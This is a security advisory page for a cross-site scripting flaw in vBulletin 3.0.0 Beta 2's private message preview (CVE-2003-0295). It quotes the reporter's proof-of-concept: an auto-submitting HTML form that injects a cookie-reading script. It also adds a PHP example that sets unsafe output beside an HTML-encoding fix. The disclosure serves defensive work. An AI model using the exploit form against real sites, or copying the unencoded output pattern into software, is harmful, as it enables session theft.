SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   vBulletin
Vendors:   Jelsoft Enterprises
vBulletin Input Validation Hole in Private Message Preview Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1006758
SecurityTracker URL:  http://securitytracker.com/id/1006758
CVE Reference:   CVE-2003-0295
Updated:  Feb 28 2004
Original Entry Date:  May 15 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 3.0.0 Beta 2
Description:   An input validation vulnerability was reported in vBulletin in the previewing of private messages. A remote user can conduct cross-site scripting attacks.

It is reported that the 'private.php' script does not properly filter user-supplied input. A remote user can create a specially crafted web form or URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running vBulletin and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The report indicates that the target user may be required to be currently logged in for the exploit to work.

A demonstration exploit web form is provided in the Source Message.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running vBulletin, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.vbulletin.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: vBulletin Input Validation Hole in Private Message Preview Permits Cross-Site Scripting Attacks
A fix is available.



 Source Message Contents

Subject:  VBulletin Preview Message - XSS Vuln


------------------------------------------------------
VBulletin Private Message "Preview Message" XSS Vulnerability
------------------------------------------------------
Any kind of XSS attack is possible.

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo;
http://www.vbulletin.com/

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0.0 Beta 2

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.2

------------------------------------------------------
Vendor Status;
------------------------------------------------------
I cannot contact the vendor for this issue! No patch is available at the moment;

------------------------------------------------------
Solution;
------------------------------------------------------
HTML encoding, like the post thread preview page;

------------------------------------------------------
Exploit Code;
------------------------------------------------------
<html>
<body>
 <form action="http://[victim]/forum/private.php" method="post"
name="vbform">
  <input type="hidden" name="do" value="insertpm" />
  <input type="hidden" name="pmid" value="" />
  <input type="hidden" name="forward" value="" />
  <input type="hidden" name="receipt" value="0" />

  <input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
  <textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
  <input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
  <input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

  <input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
  <input type="checkbox" name="signature" value="1" id="cb_signature"  />
  <input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
  <input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies"  />
 </form>
<script>
 //Set Values and Submit
 // You can write your own JS codes
 var xss = "\"><script>alert(document.cookie)<\/script>";
 document.vbform.title.value=xss;
 document.vbform.preview.click();
</script>
</body>
</html>


*You may need to log in first


Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruh@mavituna.com
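
The fix suggested in the message (HTML-encode the previewed fields, as the thread preview page does), shown as an added example that is not part of the original message and not vBulletin's own code. The function names and the input markup are assumptions made for illustration; the sample titles are constructed.

```php
<?php
// Added illustration, not vBulletin source. Function names and the
// markup fragment are hypothetical.

// Unsafe pattern: the submitted title is placed into value="" as-is,
// so a double quote in the input ends the attribute early and the
// rest of the string is parsed as markup.
function render_title_field_unsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
// byte sequences instead of returning an empty string.
function render_title_field(string $title): string
{
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $safe . '" />';
}

// True when the rendered field contains only the markup we wrote:
// one tag and the six quotes that delimit its three attributes.
function is_single_intact_tag(string $html): bool
{
    return substr_count($html, '<') === 1 && substr_count($html, '"') === 6;
}

// Constructed inputs: ordinary titles plus the probe string from the report.
$samples = [
    'Meeting notes',
    'Tom & Jerry "quoted" <b>title</b>',
    '"><script>alert(document.cookie)</script>',
];

foreach ($samples as $title) {
    $unsafe = is_single_intact_tag(render_title_field_unsafe($title));
    $fixed  = is_single_intact_tag(render_title_field($title));
    printf("unsafe intact: %-3s  encoded intact: %-3s  %s\n",
        $unsafe ? 'yes' : 'no',
        $fixed ? 'yes' : 'no',
        render_title_field($title));
}
```

The encoded renderer stays intact for all three inputs, while the unsafe one only survives the title that contains no markup characters. The same encoding has to be applied to every field the preview echoes back, not only `title`.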

 
 


Copyright 2019, SecurityGlobal.net LLC